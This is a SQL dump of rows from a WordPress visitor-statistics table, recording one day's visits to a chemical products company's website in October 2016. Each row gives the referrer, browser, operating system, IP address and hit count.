INSERT INTO `wp_statistics_visitor` VALUES (11313, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.41.225.137', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11314, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.153', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11315, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.210', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11316, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.142.85.16', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11317, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.194.30.107', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11318, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.139.36.65', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11319, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.133.162.37', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11320, '2016-10-25', 'https://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwjuq8OKuPXPAhUMEbwKHTTgBWcQFggwMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-105%2F&usg=AFQjCNE7fDUZYvw1vi_-WJ_5lLxrv9GE4g&bvm=bv.136593572,d.dGc&cad=rjt', 'MSIE', 'Windows', '11.0', '', '222.118.255.109', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11321, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.37.224.76', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11322, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.11.128.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11323, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '86.62.76.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11324, '2016-10-25', 'https://www.google.co.kr/', 'Chrome', 'Windows', '53.0.2785.143', '', '220.95.64.88', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11325, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.17.192.93', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11326, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.95.186.194', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11327, '2016-10-25', 'https://www.miller-stephenson.com/chemical-products/', 'Chrome', 'Windows', '45.0.2454.101', '', '180.153.206.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11328, '2016-10-25', 'https://www.google.co.uk/', 'Safari', 'iPhone', '10.0', '', '148.252.128.107', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11329, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.190.3.166', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11330, '2016-10-25', 'https://www.google.co.za/', 'Chrome', 'Android', '44.0.2403.133', '', '41.13.104.232', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11331, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '46.0.2490.86', '', '203.217.247.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11332, '2016-10-25', 'https://www.google.gr/', 'Chrome', 'Windows', '53.0.2785.143', '', '62.38.51.195', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11333, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.30.178.203', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11334, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '62.38.51.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11335, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.234.157.219', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11336, '2016-10-25', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '39.0.2171.99', '', '23.95.236.253', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11337, '2016-10-25', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '23.95.236.253', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11338, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '172.247.22.93', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11339, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.35.240.175', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11340, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.79.34.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11341, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.172.69.151', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11342, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.70.24.180', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11343, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '0.10.1', '', '192.99.45.205', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11344, '2016-10-25', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '91.98.3.172', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11345, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '13.76.241.210', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11346, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '122.224.175.74', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11347, '2016-10-25', 'https://www.miller-stephenson.com', 'Android Browser', 'Android', '4.0', '', '2.53.179.72', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11348, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.114.25.244', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11349, '2016-10-25', 'https://www.google.com.vn/', 'Chrome', 'Windows', '52.3.2743.134', '', '113.162.165.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11350, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '41.63.159.126', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11351, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.215.72.114', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11352, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.43.144.123', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11353, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.29.113.43', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11354, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '80.249.180.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11355, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '183.89.203.183', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11356, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '62.210.148.87', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11357, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11358, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.183', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11359, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.174.113.71', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11360, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '30.0.1599.69', '', '222.122.190.117', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11361, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.163.164.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11362, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.215.112.100', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11363, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '192.168.1.109', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11364, '2016-10-25', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Macintosh', '602.1.50', '', '24.106.220.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11365, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.133.54.124', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11366, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '5.01', '', '95.77.105.225', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11367, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '46.0.2490.86', '', '203.217.243.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11368, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.33.185.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11369, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.213.20.234', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11370, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.118.79.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11371, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.27.12.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11372, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.117.102.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11373, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.234.20.72', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11374, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.243.113.164', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11375, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '82.208.67.235', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11376, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.87.150.29', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11377, '2016-10-25', 'https://www.google.it/', 'Chrome', 'Windows', '54.0.2840.71', '', '193.169.150.98', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11378, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.226.224.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11379, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.172.14.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11380, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.41.70.8', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11381, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.177', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11382, '2016-10-25', 'https://www.miller-stephenson.com/', 'AppleWebKit', 'Windows', '537.36', '', '125.209.235.183', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11383, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.69.107.120', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11384, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.26.164.229', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11385, '2016-10-25', 'https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent', 'MSIE', 'Windows', '9.0', '', '182.118.22.142', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11386, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.6.216.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11387, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.222.85.62', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11388, '2016-10-25', 'https://www.domain2008.com/', 'MSIE', 'Windows', '9.0', '', '192.157.231.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11389, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.190.236.19', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11390, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '93.84.64.77', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11391, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.112.80.84', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11392, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '68.68.196.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11393, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.201.66.127', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11394, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.74.25.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11395, '2016-10-25', 'https://www.google.at/', 'Chrome', 'Windows', '53.0.2785.143', '', '62.2.190.130', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11396, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '40.0.2214.93', '', '45.40.253.249', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11397, '2016-10-25', 'https://www.google.it/', 'Chrome', 'Android', '53.0.2785.124', '', '5.90.213.207', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11398, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '24.37.123.58', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11399, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.200.226.119', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11400, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '136.243.42.135', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11401, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '23.226.95.147', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11402, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.35.189.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11403, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.195.183.124', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11404, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.70.9.134', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11405, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.45.214.138', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11406, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.73', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11407, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.179.4.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11408, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '46.0.2490.86', '', '203.217.248.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11409, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.253.12.103', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11410, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '14.139.55.146', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11411, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '50.0.2661.86', '', '54.194.237.38', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11412, '2016-10-25', 'https://www.google.com.tr/', 'Chrome', 'Windows', '54.0.2840.71', '', '91.199.191.4', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11413, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.92.107.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11414, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '46.0.2490.86', '', '203.217.242.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11415, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.100.143.70', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11416, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.40.61.196', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11417, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.206.155.39', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11418, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.162.64.15', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11419, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.193.215.70', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11420, '2016-10-25', 'https://www.google.de/', 'Firefox', 'Windows', '49.0', '', '213.179.134.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11421, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.180.244.67', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11422, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.32.109.99', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11423, '2016-10-25', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwi_tIu98vXPAhVJJYEKHWFyAPIYABAF&sig=AOD64_1TryA35a_ntgZazeEnzmmv5IrFcA&rct=j&q=&ved=0ahUKEwiOzoa98vXPAhXRQD4KHRnEAKcQ0QwIJw&adurl=', 'MSIE', 'Windows', '11.0', '', '131.137.245.206', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11424, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '117.199.253.20', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11425, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.231.134.158', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11426, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.54.179.119', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11427, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.79.7.3', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11428, '2016-10-25', 'https://www.miller-stephenson.com/wp-login.php', 'Firefox', 'Windows', '34.0', '', '94.79.7.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11429, '2016-10-25', 'https://www.miller-stephenson.com/miller/media_head_plastic_cleaners.html', 'MSIE', 'Windows', '9.0', '', '182.118.21.204', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11430, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '47.0', '', '99.92.63.147', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11431, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '24.63.154.108', '000', 35, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11432, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.146.46.16', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11433, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.17.128.213', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11434, '2016-10-25', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwiGmLzL9vXPAhXH24MKHZTRBwsQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepikure-3223%2F&usg=AFQjCNH9lfAxO5fTh_LmVLnLSKYD4G8g0w&bvm=bv.136593572,d.cWw', 'MSIE', 'Windows', '11.0', '', '131.137.245.207', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11435, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.12.224.162', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11436, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.104', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11437, '2016-10-25', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '24.63.154.108', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11438, '2016-10-25', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwi3lIDm-PXPAhVDlX4KHVOqDJYYABAA&sig=AOD64_3SxC8n9L1efUf2GGrjWK3DmR9MVA&rct=j&q=&ved=0ahUKEwjPovzl-PXPAhUC24MKHUSMDgkQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '131.137.245.209', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11439, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11440, '2016-10-25', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '173.166.61.237', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11441, '2016-10-25', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwiCh8HP-fXPAhVBOT4KHb2uDMMQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136593572,d.cWw', 'MSIE', 'Windows', '11.0', '', '24.63.154.108', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11442, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.43.241.74', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11443, '2016-10-25', 'https://ttsgco.blogfa.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '91.98.157.191', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11444, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '50.0.2661.94', '', '184.173.211.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11445, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.109.16.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11446, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '87.251.197.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11447, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.175.244.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11448, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.73.7.11', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11449, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '108.2.214.194', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11450, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '24.37.123.58', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11451, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.197.194.109', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11452, '2016-10-25', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=13&ved=0ahUKEwin2-r5_fXPAhVsxYMKHQJ2CA8QFghgMAw&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fdry-film-ptfe-release-agent%2F&usg=AFQjCNGpwNBIBwX4PVWyGmdtXsBx9xJKjw', 'MSIE', 'Windows', '11.0', '', '166.20.224.11', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11453, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '130.76.24.18', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11454, '2016-10-25', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwjj6Lyu_vXPAhVSwWMKHT4bCPEQFggsMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Ftech-support%2Fsds%2F&usg=AFQjCNFg9Q6BXdTX_asj1SxHpiVJGE6Y5g&bvm=bv.136593572,d.cGc', 'MSIE', 'Windows', '11.0', '', '192.35.35.35', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11455, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '50.62.161.212', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11456, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.239.1.86', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11457, '2016-10-25', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '207.136.219.35', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11458, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '210.134.165.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11459, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.136.74.55', '000', 2, 0); 
